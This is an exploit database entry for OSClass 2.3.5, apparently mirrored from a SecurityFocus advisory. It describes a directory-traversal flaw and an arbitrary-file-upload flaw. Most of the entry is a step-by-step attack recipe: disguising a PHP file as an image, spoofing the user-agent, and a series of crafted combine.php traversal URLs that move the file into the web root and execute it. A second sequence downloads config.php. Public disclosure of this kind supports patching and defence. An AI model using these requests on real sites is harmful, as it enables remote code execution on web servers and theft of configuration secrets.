OSClass 2.3.x - Directory Traversal Arbitrary File Upload

2012-03-07T00:00:00
ID EXPLOITPACK:4B56D7A0734A940292867F7AE1B65034
Type exploitpack
Reporter Filippo Cavallarin
Modified 2012-03-07T00:00:00

Description

OSClass 2.3.x - Directory Traversal Arbitrary File Upload

                                        
                                            source: https://www.securityfocus.com/bid/52336/info

OSClass is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to obtain sensitive information and to upload arbitrary code and run it in the context of the webserver process.

OSClass 2.3.5 is vulnerable; prior versions may also be affected. 

Arbitrary File Upload Vulnerability:

1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type)

2. Upload that file as picture for a new item and get its name (is 5_small.jpg)

3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php)

4. Use combine.php to move itself to oc-content/uploads
http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php
now we have a copy of combine.php placed into uploads dir (the same dir where our malicius php file has been uploaded)

5. Use uploads/combine.php to move 5_original.php to /remote.php
http://www.example.com/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php


6. Run the uploaded php file
http://www.example.com/osclass/remote.php




Directory Traversal Vulnerability: 

It is possible to download and arbitrary file (ie config.php) under the www root.

1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding)

2. Move combine.php into web root
http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php

3. Run combine to download config.php
http://www.example.com/osclass/combine.php?files=config.php